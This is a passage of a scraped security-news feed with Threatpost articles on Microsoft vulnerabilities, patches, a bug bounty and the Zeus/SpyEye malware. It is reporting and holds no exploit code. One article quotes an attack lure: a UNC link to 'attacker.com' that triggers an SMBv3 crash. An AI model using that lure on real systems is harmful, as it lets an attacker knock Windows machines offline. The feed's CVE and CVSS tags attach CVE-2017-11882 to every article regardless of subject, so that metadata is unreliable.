Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. \u201cThis means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png>)\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. \u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows Servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and a SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "cvss3": {}, "published": "2017-02-03T08:36:13", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-02-03T19:56:30", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:06", "description": "Microsoft had always rejected the possibility of a [full-scale bug bounty](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>), relying instead on solid relationships it spent the better part of a decade fostering with researchers worldwide who submit vulnerabilities to the Microsoft Security Research Center (MSRC).\n\nYet in the past couple of years, the company has bent a bit in the other direction, instituting reward programs for researchers who develop new bypasses for exploit mitigations, or defensive techniques that can be folded into Microsoft products.\n\nThe company has already paid out several hundred thousands of dollars to researchers who have successfully [beaten exploit mitigations in Windows](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>), including ASLR, DEP, SEHOP and more, as well as rewarding one researcher $200,000 for a new technique to [defend against return-oriented programming (ROP) attacks](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712>).\n\nIndividual vulnerability payouts have been off the board for the most part (Microsoft did institute a [temporary bounty for Internet Explorer 11](<http://threatpost.com/researchers-nab-28k-in-microsoft-bug-bounty-program/102535>) in the summer of 2013), until today when Microsoft launched the [Microsoft Online Services Bug Bounty Program](<http://technet.microsoft.com/en-us/security/dn800983>). Bounties start at $500,and vulnerabilities in cloud-based services such as Office 365 are the first eligible in the program, Microsoft said.\n\n\u201cGenerally, bounties will be paid for significant web application vulnerabilities found in eligible online service domains,\u201d Microsoft said in a statement announcing the program, adding that researchers must also submit concise steps that will allow Microsoft engineers to reproduce the vulnerability.\n\nOnly certain domains are eligible, Microsoft said. That list includes:\n\n * portal.office.com\n * *.outlook.com (Office 365 for business email services applications, excluding any consumer \u201coutlook.com\u201d services)\n * outlook.office365.com\n * login.microsoftonline.com\n * *.sharepoint.com\n * *.lync.com\n * *.officeapps.live.com\n * www.yammer.com\n * api.yammer.com\n * adminwebservice.microsoftonline.com\n * provisioningapi.microsoftonline.com\n * graph.windows.net\n\nOnly certain vulnerability classes are eligible as well, including cross-site scripting, cross-site request forgery, insecure direct object references, injection and authentication flaws, server-side code execution, privilege escalation, security configuration issues and cross-tenant data tampering or access eligible in multitenant services, Microsoft said.\n\n\u201cThe aim of the bug bounty is to uncover significant vulnerabilities that have a direct and demonstrable impact to the security of our users and our users\u2019 data,\u201d Microsoft said.\n\nMicrosoft also listed a number of vulnerabilities that are ineligible; those include:\n\n * Missing HTTP Security Headers (such as X-FRAME-OPTIONS) or cookie security flags (such as \u201chttponly\u201d)\n * Server-side information disclosure such as IPs, server names and most stack traces\n * Bugs in the web application that only affect unsupported browsers and plugins\n * Bugs used to enumerate or confirm the existence of users or tenants\n * Bugs requiring unlikely user actions\n * URL Redirects (unless combined with another flaw to produce a more severe vulnerability)\n * Vulnerabilities in platform technologies that are not unique to the online services in question (Apache or IIS vulnerabilities, for example.)\n * \u201cCross Site Scripting\u201d bugs in SharePoint that require \u201cDesigner\u201d or higher privileges in the target\u2019s tenant.\n * Low impact CSRF bugs (such as logoff)\n * Denial of Service issues\n * Cookie replay vulnerabilities\n\nMicrosoft also made it clear that it wants researchers to shy away from denial-of-service testing or any type of automated testing of its services that could lead to significant traffic sent their way. Researchers are also discouraged from trying to access data belonging to someone else consuming a cloud service or expanding a test to include social engineering or phishing against Microsoft employees.\n\nMicrosoft said complete submissions can be sent to [secure@microsoft.com](<mailto:secure@microsoft.com>).\n", "cvss3": {}, "published": "2014-09-23T15:52:05", "type": "threatpost", "title": "Microsoft Online Services Bug Bounty Program Launches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-23T19:52:05", "id": "THREATPOST:222B126A673B8B22370D386B699A7F90", "href": "https://threatpost.com/microsoft-starts-online-services-bug-bounty/108486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:57", "description": "**![Microsoft](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073827/micro_patch_19.jpg)UPDATE \u2013 **In an unexpected turn, Microsoft\u2019s monthly Patch Tuesday security updates released today did not include patches for Internet Explorer vulnerabilities used during the Pwn2Own contest one month ago.\n\nThe popular hacker contest attracted researchers from all over who were targeting all the major browsers, as well as third-party software such as [Flash and Java](<https://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Companies such as VUPEN and MWR Labs were able to beat locked-down versions of [IE 10 running on Windows 8](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) and Mozilla\u2019s Firefox browser, as well as Chrome running on Windows. Unlike Mozilla and Google, both of which [patched the flaws exploited during the contest within 24 hours](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>), Microsoft had yet to update its browser. This has been compounded after last Thursday\u2019s advanced notification that indicated a cumulative IE update was coming today.\n\n\u201cThis puts them quite a bit behind other browsers that already patched their Pwn2Own bugs,\u201d said Andrew Storms, director of security operations at nCircle.\n\nA Microsoft representative, along with Qualys CTO Wolfgang Kandek, said the delay is likely due to regression testing and QA work necessary for patches.\n\n\u201cMicrosoft works with the security community to protect our customers against all threats and we are investigating possible issues identified by researchers during the Pwn2Own competition. We are not aware of any attacks and the issues should not affect our customers, as Pwn2Own organizers do not publicly disclose the competition\u2019s findings,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing.\n\nToday\u2019s IE rollup addresses a pair of critical remote code execution flaws in versions 6-10 the browser. Both are use- after free vulnerabilities that exist in the way IE accesses objects in memory that have been deleted. \u201cThese vulnerabilities may corrupt memory in such a way that an attacker could execute arbitrary code in the context of a user,\u201d Microsoft said in its advisory [MS13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). Users would have to be lured to a website hosting an exploit via a phishing or spam email, Microsoft said.\n\n\u201cMS13-028 has a score of \u201c2\u201d in the Exploitability Index, indicating that the construction of an exploit for the vulnerability is not entirely straightforward and not expected within the next 30 days,\u201d Kandek said.\n\nThe IE update is one of nine bulletins released today addressing 14 vulnerabilities, a relatively light month compared to the 57 updates foisted upon users in February. One other bulletin was rated critical, another remote code execution vulnerability in Microsoft Remote Desktop Client. [MS13-029](<https://technet.microsoft.com/en-us/security/bulletin/ms13-029>) includes patches for Remote Desktop Connection 6.1 Client and Remote Desktop Connection 7.0 Client on Windows XP, Vista and Windows 7, as well as Windows Server 2003, 2008 and 2008 R2.\n\n\u201cA remote-code execution vulnerability exists when the Remote Desktop ActiveX control, mstscax.dll, attempts to access an object in memory that has been deleted. An attacker could exploit the vulnerability by convincing the user to visit a specially crafted webpage.\u201d Microsoft said in its alert. \u201cAn attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.\u201d\n\nRoss Barrett, senior manager of security engineering at Rapid7 said that while versions 6.1 and 7 are vulnerable, version 8 is unaffected and is not yet the default.\n\n\u201cThis issue could be triggered through an RDP link in a browser or other content. A workaround would be to set the \u2018kill-bit\u2019 for these ActiveX controls, but the update actually fixes the issue, rather than disabling the RDP control,\u201d Barrett said.\n\nStorms said there are enough mitigating circumstances to make it less problematic for most businesses.\n\n\u201cThe bug does not affect the latest RDP client, version 8, which dramatically reduces the affected number of machines,\u201d Storms said. \u201cMicrosoft has released mitigation steps to disable the affected ActiveX control. Also, if your users browse with default IE settings, they will be presented with the \u2018gold bar\u2019 warning providing them with an opportunity to opt out of an attack.\u201d\n\nThe remaining seven bulletins are rated critical by Microsoft, a denial-of-service bug in Active Directory has caught experts\u2019 attention. [MS13-032](<https://technet.microsoft.com/en-us/security/bulletin/ms13-032>) could be triggered if an attacker sends a specially crafted query to the LDAP service that will consume CPU cycles and cause it to crash. The vulnerability affects Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services on Microsoft Windows servers.\n\n\u201cIt should be high on the list for enterprise installations,\u201d Kandek said. \u201cAn attacker can shut down the domain controllers for an organization using only with a single workstation.\u201d\n\nAmong the remaining bulletins are privilege escalation vulnerabilities and an information disclosure bug:\n\n * [MS13-030](<https://technet.microsoft.com/en-us/security/bulletin/ms13-030>) is an information-disclosure vulnerability in SharePoint if an attacker knew the location of a SharePoint list and gained access with legitimate credentials.\n * [MS13-031](<https://technet.microsoft.com/en-us/security/bulletin/ms13-031>) is a privilege escalation flaw in the Windows Kernel. Exploits would require valid credentials in order to carry out an attack.\n * [MS13-033](<https://technet.microsoft.com/en-us/security/bulletin/ms13-033>) affects Windows Client/Server Runtime Subsystem in the way that the system handles objects in memory. Attackers would need valid credentials and local access to pull off an exploit.\n * [MS13-034](<http://technet.microsoft.com/en-us/security/bulletin/ms13-034>) is another privilege escalation bug, this time in Windows Defender, the Microsoft antimalware client. Successful exploits could enable an attacker to run code on an infected machine, view, change or delete data or create new accounts.\n * [MS13-035](<https://technet.microsoft.com/en-us/security/bulletin/ms13-035>) repairs a vulnerability in Microsoft HTML Sanitization Component found in Microsoft Office. An attacker would have to send a malicious Office document to pull off an attack.\n * [MS13-036](<https://technet.microsoft.com/en-us/security/bulletin/ms13-036>) patches three vulnerabilities in Kernel Mode Driver that elevates privileges for an attacker, who must have valid credentials and local access to exploit the flaws.\n\n_This article was updated to include a comment from Microsoft._\n", "cvss3": {}, "published": "2013-04-09T19:18:19", "type": "threatpost", "title": "Pwn2Own IE Vulnerabilities Missing from Microsoft Patch Tuesday Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-18T18:36:16", "id": "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "href": "https://threatpost.com/pwn2own-ie-vulnerabilities-missing-microsoft-patch-tuesday-updates-040913/77712/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "[![Windows patch](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07061430/windows_patch_3.thumbnail.jpg)](<https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/>)Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for a number of certificates that were cross-signed by GTE and Entrust. Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Microsoft is warning users about targeted attacks against a new vulnerability in several versions of Windows and Office that could allow an attacker to take over a user\u2019s machine. The bug, which is not yet patched, is being used as part of targeted attacks with malicious email attachments, mainly in the Middle East and Asia.\n\nIn the absence of a patch, Microsoft has released a FixIt tool for the vulnerability, which prevents exploits against the vulnerability from working. The bug affects Windows Vista, Windows Server 2008 and Microsoft Office 2003 through 2010.\n\n\u201cThe exploit requires user interaction as the attack is disguised as an email requesting potential targets to open a specially crafted Word attachment. If the attachment is opened or previewed, it attempts to exploit the vulnerability using a malformed graphics image embedded in the document. An attacker who successfully exploited the vulnerability could gain the same user rights as the logged on user,\u201d the Microsoft [advisory](<http://blogs.technet.com/b/msrc/archive/2013/11/05/microsoft-releases-security-advisory-2896666-v2.aspx>) says.\n\nThe vulnerability doesn\u2019t affect the current versions of Windows, the company said, and users who are running potentially vulnerable products can take a couple of actions in order to protect themselves. Installing the [FixIt tool](<http://technet.microsoft.com/en-us/security/advisory/2896666>) will help prevent exploitation, as will deploying the Enhanced Mitigation Experience Toolkit (EMET), which helps mitigate exploits against certain classes of bugs.\n\n\u201cThe vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images. An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights<\u2018 Microsoft officials said.\n", "cvss3": {}, "published": "2013-11-05T14:07:32", "type": "threatpost", "title": "Microsoft Warns of Targeted Attacks on Windows 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-05T19:07:32", "id": "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "href": "https://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:38", "description": "[![Spyeye bot](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064546/spyeye_bot.jpg)](<https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/>)Everyone knows that the first year of marriage can be a tough one -around three percent of them end in the first 12 months. Looks like the same can be true of malware marriages, with the union of the Zeus and SpyEye Trojan now in question.\n\nJust one year after news broke that the Zeus and SpyEye Trojan families had merged, virus experts say there\u2019s reason to question whether the union is still intact.\n\nResearchers at Microsoft and Kaspersky Lab told Threatpost that, although there\u2019s clearly evidence that code was shared between the two malware families, the rumored merger of Zeus and SpyEye never took place. In fact, the two botnets continue as separate entities, with some researchers wondering if they are even controlled by the same individuals or criminal groups.\n\nZeus and SpyEye were the two main families of botnet software, with SpyEye [playing the role of upstart competitor to the more established Zeus](<https://threatpost.com/tracker-spyeye-not-yet-zeus-stature-110910/>). For a while, the competition for online hosts was intense, with [both malware families adding features to remove the other on systems they infected](<https://threatpost.com/malware-trojan-wars-spyeye-vs-zeus-040110/>).\n\nThat rivalry seemed to end in October, 2010, when researchers observed what appeared to be a merger of the two crime kits, around the same time that the author of the Zeus botnet decided to release the malware code as an open source repository. Those reports were backed by online forum posts by the SpyEye author claiming that the Zeus source code had been turned over to him and that the two Trojans [would soon be \u201cmerged into one powerful Trojan](<http://krebsonsecurity.com/2010/10/spyeye-v-zeus-rivalry-ends-in-quiet-merger/>).\u201d\n\nBy the end of 2010, an update to the SpyEye crimeware toolkit (1.3.X) included a feature, formerly unique to the Zeus crime kit, that targeted an anti-Trojan agent developed by the firm Trusteer. The new version of SpyEye also removed a feature to remove the Zeus malware if it was found running on the affected machine, Microsoft said.\n\nDespite some early reports that a merged SpyEye/Zeus Trojan was circulating online, the promised merger never happened, beyond some basic cutting and pasting of code. In fact, subsequent reports suggested that the two malware families were [continuing down separate tracks, with Zeus adding new features not seen in the other](<https://threatpost.com/zeus-malware-not-dead-yet-new-features-being-added-030411/>).\n\nNow Microsoft says that reports of the merger may have been overblown. In a post Tuesday on the company\u2019s Threat Research and Response Blog, researchers said that they considered reports of the union to be \u201cspeculative\u201d and saw little evidence that Zeus and SpyEye were sharing code.\n\nThe company declined to discuss the specifics of its research, but stood by the statement in its blog post.\n\nDmitry Tarakanov, a researcher at Kaspersky Lab who has studied the two families said that there was a code transfer from Zeus to SpyEye in the immediate aftermath of the source code being transferred to the SpyEye author. For example, the SpyEye author grabbed a Zeus feature that allowed the malware to force Web browsers on infected systems to load malicious HTML served by the botnet, even in cases where the host had a recent version of the page in question (say, an electronic banking site) stored locally in its browser cache. \u201cSpyEye could not intercept the cached html-code,\u201d Tarakanov wrote in an e-mail. \u201cSo the author of Spyeye had seen that part of the code where Zeus replaces the cache as well and added that part of code into his own source code of SpyEye.\u201d\n\nBut there\u2019s little evidence of further consolidation of the two code bases after that, he said. \u201cWe can make a conclusion that author of SpyEye did not even try to concoct one bot squeezing all the best from two source codes,\u201d he wrote.\n\nTarakanov said he believes the original author of Zeus was interested in washing his hands of the malware industry, especially with increased attention to the Zeus malware by law enforcement. In September, 2010, more than 60 individuals were charged in the U.S. and U.K. for crimes linked to the Zeus botnet. That may have chased the bot\u2019s original author into hiding.\n\nHuman nature may explain the SpyEye author\u2019s failure to carry out a grand union of the two botnets that was originally promised. \u201cPeople tend not to change work,\u201d Tarakanov wrote. In other words: \u2018if it ain\u2019t broke, don\u2019t fix it,\u2019 as the saying goes.\n\nHowever, its harder to explain the subsequent modifications to the Zeus code, which Tarakanov said are \u201ctoo serious and notable\u201d to be the work of amateurs. While its possible that the SpyEye author would choose to keep the malware families separate, its harder to understand why new features added to Zeus weren\u2019t also added to SpyEye. \u201cA programmer really does not like to code one thing twice. So, it\u2019s hard to believe that the author of SpyEye somehow developed new features (but different) for SpyEye and for Zeus,\u201d he wrote.\n\nOne possibility is that both tools are being offered to cyber criminals simultaneously, rather than requiring any one set of customers to adapt abandon their platform of choice, or asking everyone to switch to a new, merged platform. Aviv Raff, the CTO of Seculert, said in June that his researchers had found [evidence of back-end servers that are being used to host both the Zeus and SpyEye crimeware packs](<https://threatpost.com/malware-exploit-kit-writers-merging-their-talents-062411/>). Attackers who are interested in using one or the other can have their choice of which tool they\u2019d like to use at any given time, said Raff, who expects greater convergence of crime kits like SpyEye and Zeus and Web exploit kits in the future. \n\nIts also possible that main development of Zeus has been passed to a third party now that the malware source code is available online. \u201cThe situation is too muddy and there are too many conflicting arguments,\u201d Tarakanov said. \n", "cvss3": {}, "published": "2011-10-14T17:58:10", "type": "threatpost", "title": "SpyEye and Zeus Malware: Married Or Living Separately?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:35", "id": "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "href": "https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/75755/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:54", "description": "Microsoft has released a new version of the MS13-036 patch that was causing some customers\u2019 machines to crash. The company had recommended in the days after the original fix was first released that customers [uninstall the MS13-036 patch](<http://threatpost.com/microsoft-uninstall-faulty-patch-tuesday-security-update-041213/>) while Microsoft investigated the cause of the problems.\n\nThe new fix that Microsoft released on Tuesday resolves some conflicts with third-party applications that apparently were causing the blue screen issues for some people. The company didn\u2019t specify which software was causing the crashes, but said that the update should resolve the problems.\n\n\u201cWe\u2019ve determined that the update, when paired with certain third-party software, can cause system errors,\u201d said Trustworthy Computing group manager Dustin Childs at the time that the patch was recalled earlier this month.\n\nThe MS13-036 patch fixes a pair of race condition vulnerabilities in the Windows kernel, both of which could be used for code execution. However, the patch was rated important rather than critical because an attacker would need physical access to a vulnerable machine in order to run code using one of these bugs.\n\nChilds said in a blog post Tuesday that customers should install the revised update as soon as possible.\n\n\u201cAs we [previously discussed](<http://blogs.technet.com/b/msrc/archive/2013/04/11/kb2839011-released-to-address-security-bulletin-update-issue.aspx> \"previously discussed\" ), we stopped distributing this update when we learned some customers were having issues. The new update, [KB2840149](<http://support.microsoft.com/kb/2840149> \"KB2840149\" ), still addresses the Moderate security issue described in MS13-036, and should not cause these issues. If you have automatic updates enabled, you won\u2019t need to take any actions. For those manually updating, we encourage you to apply this update at your earliest convenience,\u201d he said.\n", "cvss3": {}, "published": "2013-04-24T10:00:23", "type": "threatpost", "title": "Microsoft Releases Updated MS13-036 Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T14:02:36", "id": "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "href": "https://threatpost.com/microsoft-releases-updated-ms13-036-patch/99885/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07054337/microsoft_sdl_01.jpg)](<https://threatpost.com/microsoft-give-security-guidelines-agile-110909/>)Microsoft will release on Tuesday \nguidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security \nDevelopment Lifecycle (SDL) to Agile, an umbrella term for a \ndevelopment model frequently used for Web-based applications released \nunder short deadlines, called \u201csprints.\u201dilding online applications and for those \nusing the Agile code-development process. [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). [Computerworld]\n", "cvss3": {}, "published": "2009-11-09T18:26:11", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:14:29", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:14", "description": "[![Microsoft tool](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064907/microsoft_tool.jpg)](<https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/>)Microsoft has released a beta version of a new tool that can help victims of malware attacks recover from ugly infections, even if they don\u2019t have the ability to reach the Internet. The Windows Defender Offline tool enables users to clean their systems of malware from a CD or other removable media.\n\nIn some ways, the new tool is a throwback to the bygone days of computing and viruses when the malware universe was small enough that all of the definitions to combat it could fit on a floppy disk. Back then, users would often have a rescue disk that could help them boot their PC in the event of a messy malware infestation. Microsoft\u2019s [Windows Defender Offline](<http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline>) uses the same idea, by enabling users to download a large definition file and then transfer it to a USB drive, CD or other portable medium.\n\nThere are some pernicious classes of malware, including some rootkits and ransomware programs, that will prevent users from accessing the Internet or doing any kind of normal operations on their PCs. In those cases, it can be difficult or impossible for a user to run a system scan with installed antimalware applications or run a scan from the Web.\n\nA user who finds herself in such a situation would be able to boot her PC from the CD or USB driver containing the offline tool and then proceed with the malware cleaning.\n\n\u201cWindows Defender Offline Beta can help remove such hard to find malicious and potentially unwanted programs using definitions that recognize threats. Definitions are files that provide an encyclopedia of potential software threats. Because new threats appear daily, it\u2019s important to always have the most up-to-date definitions installed in Windows Defender Offline Beta. Armed with definition files, Windows Defender Offline Beta can detect malicious and potentially unwanted software, and then notify you of the risks,\u201d Microsoft\u2019s documentation for the Windows Defender Offline tool says.\n\nThe new tool is currently in beta form, but it\u2019s available for download from Microsoft\u2019s site now.\n", "cvss3": {}, "published": "2011-12-09T12:57:19", "type": "threatpost", "title": "Microsoft Unveils New Windows Defender Offline Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:11", "id": "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "href": "https://threatpost.com/microsoft-unveils-new-windows-defender-offline-tool-120911/75979/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:02", "description": "[![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053828/quicktime_microsoft2.jpg)](<https://threatpost.com/microsoft-warns-dangerous-directshow-flaw-attacks-052809/>)Microsoft today warned that hackers are using rigged QuickTime media files to exploit an unpatched vulnerability in DirectShow, the APIs used by Windows programs for multimedia support.\n\nThe company has activated its security response process to deal with the zero-day attacks has issued a pre-patch advisory with workarounds and a one-click \u201cfix it\u201d feature to enable the mitigations.\n\nFrom the [advisory](<http://www.microsoft.com/technet/security/advisory/971778.mspx>):\n\nMicrosoft is aware of limited, active attacks that use this exploit code. While our investigation is ongoing, our investigation so far has shown that Windows 2000 Service Pack 4, Windows XP, and Windows Server 2003 are vulnerable; all versions of Windows Vista and Windows Server 2008 are not vulnerable.\n\nAn entry on the MSRC blog provides [more details](<http://blogs.technet.com/msrc/archive/2009/05/28/microsoft-security-advisory-971778-vulnerability-in-microsoft-directshow-released.aspx>):\n\nThe vulnerability is in the QuickTime parser in 